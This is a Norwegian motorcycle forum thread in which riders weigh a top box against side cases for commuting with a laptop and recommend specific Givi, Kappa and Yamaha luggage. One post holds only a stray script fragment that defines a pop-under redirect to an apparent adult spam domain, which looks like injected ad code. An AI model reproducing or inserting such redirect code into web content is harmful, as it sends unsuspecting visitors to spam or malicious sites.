Toppboks vs sidevesker til daglig
-
- Innlegg: 294
- Registrert: 18 jul 2017, 11:06
- Motorsykkelen din: Triumph Speed 400 (2024)
- Sted: Oslo
Toppboks vs sidevesker til daglig
Jeg har tenkt å utruste min MT-07 med både toppboks og sidevesker fram mot sommeren for å kunne reise på lengre turer.
Men til daglig pendling blir jo det overkill. I fjor kjørte jeg med ryggsekk som går helt greit, men jeg savner å låse inn hjelm og kanskje et par andre ting. Blir gjerne kvitt hele sekken også, men er avhengig av å ha med PC rundt omkring. Har ofte møter ute hos kunder i Oslo og omegn.
Først tenkte jeg at en 39L toppboks fra Givi kan gjøre susen, men da blir det vel kanskje stort sett hjelmen som får plass?
Hvis jeg i stedet har sideveskene på, kan jeg kanskje få hjelmen oppi på en side og PCen i den andre siden?
Tar veldig gjerne mot råd og erfaringer. Og selvsagt tips til gode bokser/vesker. Tror kanskje jeg ønsker meg harde/semiharde sidevesker.
Men til daglig pendling blir jo det overkill. I fjor kjørte jeg med ryggsekk som går helt greit, men jeg savner å låse inn hjelm og kanskje et par andre ting. Blir gjerne kvitt hele sekken også, men er avhengig av å ha med PC rundt omkring. Har ofte møter ute hos kunder i Oslo og omegn.
Først tenkte jeg at en 39L toppboks fra Givi kan gjøre susen, men da blir det vel kanskje stort sett hjelmen som får plass?
Hvis jeg i stedet har sideveskene på, kan jeg kanskje få hjelmen oppi på en side og PCen i den andre siden?
Tar veldig gjerne mot råd og erfaringer. Og selvsagt tips til gode bokser/vesker. Tror kanskje jeg ønsker meg harde/semiharde sidevesker.
Re: Toppboks vs sidevesker til daglig
Selv foretrekker jeg en toppboks da det er enkelt å legge ting oppi.
Har også en vanntett messenger bag ( https://kriega.us/urban-messenger-bag ) som jeg har datamaskinen i.
Om du skal ha sidevesker så ville jeg om mulig funnet noe som er topplastet. Er travelt å skulle organisere en sideveske der alt detter ut så fort du åpner den.
Har også en vanntett messenger bag ( https://kriega.us/urban-messenger-bag ) som jeg har datamaskinen i.
Om du skal ha sidevesker så ville jeg om mulig funnet noe som er topplastet. Er travelt å skulle organisere en sideveske der alt detter ut så fort du åpner den.
Det evige beitet: Rieju RMX 50 // Yamaha DT125RE // Yamaha Fazer FZS600 // Yamaha MT-10 SP -17
I stallen: BMW S1000RR -22 // Honda CBR1000RR -05 (Banesykkel)
I stallen: BMW S1000RR -22 // Honda CBR1000RR -05 (Banesykkel)
- Bjerknez
- Innlegg: 22958
- Registrert: 06 aug 2013, 00:59
- Motorsykkelen din: Triumph Rocket III GT
- Sted: Fredrikstad
- Kontakt:
Re: Toppboks vs sidevesker til daglig
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
- JanK
- Innlegg: 719
- Registrert: 28 mar 2011, 12:52
- Motorsykkelen din: mcimport.it
- Sted: Milano, Italia
- Kontakt:
Re: Toppboks vs sidevesker til daglig
Kun toppboks til daglig bruk, sykkelen er mye mer smidig i bytrafikk uten sidekoffertene.tormodg skrev: ↑17 jan 2018, 15:20 Jeg har tenkt å utruste min MT-07 med både toppboks og sidevesker fram mot sommeren for å kunne reise på lengre turer.
Men til daglig pendling blir jo det overkill. I fjor kjørte jeg med ryggsekk som går helt greit, men jeg savner å låse inn hjelm og kanskje et par andre ting. Blir gjerne kvitt hele sekken også, men er avhengig av å ha med PC rundt omkring. Har ofte møter ute hos kunder i Oslo og omegn.
Først tenkte jeg at en 39L toppboks fra Givi kan gjøre susen, men da blir det vel kanskje stort sett hjelmen som får plass?
Hvis jeg i stedet har sideveskene på, kan jeg kanskje få hjelmen oppi på en side og PCen i den andre siden?
Tar veldig gjerne mot råd og erfaringer. Og selvsagt tips til gode bokser/vesker. Tror kanskje jeg ønsker meg harde/semiharde sidevesker.
Givi er topp, gå for V47: https://www.givi.it/cases/Monokey/V47NN%20TECH
Mer enn nok plass. Regner med at det er sjelden du har hjelmen og pc i boksen samtidig. Uansett er det plass til begge.
Jeg kjører (maxi) scooter til daglig, med stor toppboks, kan ikke leve uten.
mcimport.it - brukt mc fra italia + deler, utstyr og alt annet mc relatert!
Vinterlagring av motorsykkel i Milano, ta kontakt for informasjon.
Leverandør av SC Project eksos, kontakt meg for priser.
MargaMotoco, custom mc - https://www.instagram.com/margamotoco/
Vinterlagring av motorsykkel i Milano, ta kontakt for informasjon.
Leverandør av SC Project eksos, kontakt meg for priser.
MargaMotoco, custom mc - https://www.instagram.com/margamotoco/
- kvase
- Innlegg: 1064
- Registrert: 29 des 2015, 02:35
- Motorsykkelen din: KTM 1090 ADV-R/Yamaha WR450F
- Sted: Arendal
- Kontakt:
Re: Toppboks vs sidevesker til daglig
https://nettbutikk.mcoslo.no/BAGASJE/BA ... )-(KVE58A) fines også ned noen størrelser
https://nettbutikk.mcoslo.no/BAGASJE/BA ... )-(TRK46N)
https://nettbutikk.mcoslo.no/BAGASJE/BA ... )-(TRK46N)
Vespa Piago 75cc Panter 50 cc Honda FT 500 cc XT660 Z Tennere KTM 1050 ADV-- i stallen nå KTM 1090 ADV-R
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
- AJ
- Administrator
- Innlegg: 37907
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Toppboks vs sidevesker til daglig
Veldig praktisk med stor toppboks, som ikke ser så uhyre dominerende ut, som den jeg har, en GIVI Trekker 52 l. Får fint plass til både hjelm og PC oppi denne.
Kjempefornøyd med denne . Brukte den på Stelvio'en, min forrige sykkel, og på den jeg har nå.
Kommer ganske sikkert til å ta den med videre også, til neste sykkel, når tiden for å bytte er inne.
Kjempefornøyd med denne . Brukte den på Stelvio'en, min forrige sykkel, og på den jeg har nå.
Kommer ganske sikkert til å ta den med videre også, til neste sykkel, når tiden for å bytte er inne.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
- Innlegg: 294
- Registrert: 18 jul 2017, 11:06
- Motorsykkelen din: Triumph Speed 400 (2024)
- Sted: Oslo
Re: Toppboks vs sidevesker til daglig
Tusen takk for mange flotte innspill! Og jeg forstår at sidevesker er risikosport langs kaia. :)
- AJ
- Administrator
- Innlegg: 37907
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Toppboks vs sidevesker til daglig
Nå skal det også sies at det er en del MC-folk som griner på nesa av toppbokser, som mener at sykkelen ikke blir seende ut med en slik.
Men de stemmene må du bare overhøre
Det er det praktiske som teller.
Men de stemmene må du bare overhøre
Det er det praktiske som teller.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
-
- Innlegg: 783
- Registrert: 11 apr 2010, 19:42
- Motorsykkelen din: BMW 1250
- Sted: Vestfold
Re: Toppboks vs sidevesker til daglig
Toppboks er tingen En som er stor nok til det du har med deg i det daglige.Har selv flere størrelser som jeg bruker etter behov. Sidevesker i tillegg på tur er veldig greit
Pakker det meste og tyngste i sideveskene når jeg er på tur. Har da fremdeles plass til hjelm og lette ting i toppboksen
Pakker det meste og tyngste i sideveskene når jeg er på tur. Har da fremdeles plass til hjelm og lette ting i toppboksen
Tempo: Corvette 300 1965(Comet motor)Svithun Safir 400 1970(Trigger 50 motor)Panther1968(Fighter 100 motor)
1982 Suzuki 400 E
1986 Yamaha XV 1000
2005 Honda Transalp 650
2003 Honda Varadero XL 1000
2002 BMW F650 CS
2015 Yamaha MT09 Tracer. Kjørt 30420km på 3 sesonger.
2021 BMW 1250.Kjøpt ny 2021.Kjørt 29968km på 3 sesonger.
1982 Suzuki 400 E
1986 Yamaha XV 1000
2005 Honda Transalp 650
2003 Honda Varadero XL 1000
2002 BMW F650 CS
2015 Yamaha MT09 Tracer. Kjørt 30420km på 3 sesonger.
2021 BMW 1250.Kjøpt ny 2021.Kjørt 29968km på 3 sesonger.
-
- Innlegg: 294
- Registrert: 18 jul 2017, 11:06
- Motorsykkelen din: Triumph Speed 400 (2024)
- Sted: Oslo
Re: Toppboks vs sidevesker til daglig
Jeg er i og for seg enig i at det ikke er veldig lekkert. Men pendling er pendling...og praktisk er praktisk.
Da blir det nok en toppboks i første omgang.
Da blir det nok en toppboks i første omgang.
- Viffern94
- Innlegg: 104
- Registrert: 28 okt 2015, 21:06
- Motorsykkelen din: Honda VFR 800FI 2001
- Sted: Trondheim
Re: Toppboks vs sidevesker til daglig
Jeg har original toppboks på 52l fra Yamaha
Har den på min MT-09Tracer og er kjempefornøyd. Vet ikke hvordan den utseendemessig vil se ut på MT-07.
Veldig praktisk til pendling, plass til stor hjelm og ekstra stæsj. Låsen kan byttes slik at du kan bruke nøkkelen til sykkelen.
Har den på min MT-09Tracer og er kjempefornøyd. Vet ikke hvordan den utseendemessig vil se ut på MT-07.
Veldig praktisk til pendling, plass til stor hjelm og ekstra stæsj. Låsen kan byttes slik at du kan bruke nøkkelen til sykkelen.
Honda CBF125,2010- Honda CB750,1997- Yamaha MT-09Tracer,2016- Yamaha FJR1300,2016-Honda VFR800,2001--
- FredrikE24
- Innlegg: 4723
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Toppboks vs sidevesker til daglig
Kjører selv med både toppveske, tankveske og sidekofferter til daglig da jeg har med meg så mye rart. Jeg synes det å kjøre med sidekofferter er helt greit. Lanesplitter langt "hardere" enn mange med en halvmeter smalere sykkel Sånn for syns skyld også, så syns man mye bedre forfra på min sykkel om man har sidekoffertene på
Re: Toppboks vs sidevesker til daglig
Toppboks er tingen til jobbpendling. Da slipper du å tenke på sideveskene ved forbikjøring og manøvrering imellom biler i kø.
Har selv V47 fra Givi som jeg bruker til jobb pc sekk. Slipper da også regntrekk på pc sekken.
En annen ting er at sideveskene sjelden stikker utenfor styret. På en GSA jeg kjørte i 6 år var sykkelen 99cm på styret og 99cm med begge sideveskene. Greit å vite at om styret kommer mellom bilene så gjør veskene det også så lenge en holder seg på "line" og bilene ikke har endret posisjon i køen
Har selv V47 fra Givi som jeg bruker til jobb pc sekk. Slipper da også regntrekk på pc sekken.
En annen ting er at sideveskene sjelden stikker utenfor styret. På en GSA jeg kjørte i 6 år var sykkelen 99cm på styret og 99cm med begge sideveskene. Greit å vite at om styret kommer mellom bilene så gjør veskene det også så lenge en holder seg på "line" og bilene ikke har endret posisjon i køen
-
- Innlegg: 294
- Registrert: 18 jul 2017, 11:06
- Motorsykkelen din: Triumph Speed 400 (2024)
- Sted: Oslo
Re: Toppboks vs sidevesker til daglig
Jeg har fått kjøpt Yamaha originalt bagasjebrett og 39L Yamaha City toppboks m/lås på Finn, så da har jeg i alle fall fått ordnet noe av det jeg trenger.
Til sidevesker ønsker jeg harde vesker. Jeg håper det er mulig å benytte feks GIVI feste samtidig som jeg har originalt Yamaha bagasjebrett.
Til sidevesker ønsker jeg harde vesker. Jeg håper det er mulig å benytte feks GIVI feste samtidig som jeg har originalt Yamaha bagasjebrett.
- kjellv
- Moderator
- Innlegg: 6960
- Registrert: 14 aug 2012, 23:16
- Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
- Sted: Molde
- Kontakt:
Re: Toppboks vs sidevesker til daglig
Uten å ha sjekket så tror jeg det går bra. Yamahabæreren har smale armer ned på bakramma og kan nok kombineres med det aller meste.tormodg skrev:Jeg har fått kjøpt Yamaha originalt bagasjebrett og 39L Yamaha City toppboks m/lås på Finn, så da har jeg i alle fall fått ordnet noe av det jeg trenger.
Til sidevesker ønsker jeg harde vesker. Jeg håper det er mulig å benytte feks GIVI feste samtidig som jeg har originalt Yamaha bagasjebrett.
edit: Bagasjebæreren fra Yamaha til MT-07 ser slik ut. Den erstatter de originale passasjerhåndtakene og benytter de samme festepunktene. Det er derfor stor sannsynlighet for at nesten alt som er tilpasset MT-07 fra alle utstyrsleverandører kan benyttes sammen med denne bæreren. Denne bæreren blir som en forlengelse av de originale passasjerhåndtakene som du likevel må ta av for å montere bæreren.
Men jeg tar likevel litt forbehold, jeg har ikke sett Givi sine.. Som et alternativ til Givi, se også på Kappa sitt KLX bagasjesystem og K33 bokser. Det fine med KLX er at det er meget enkelt å ta av veskebærerne når du ikke bruker dem.
http://www.sps.no/filer/bagasjebrosjyre_lowres.pdf
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.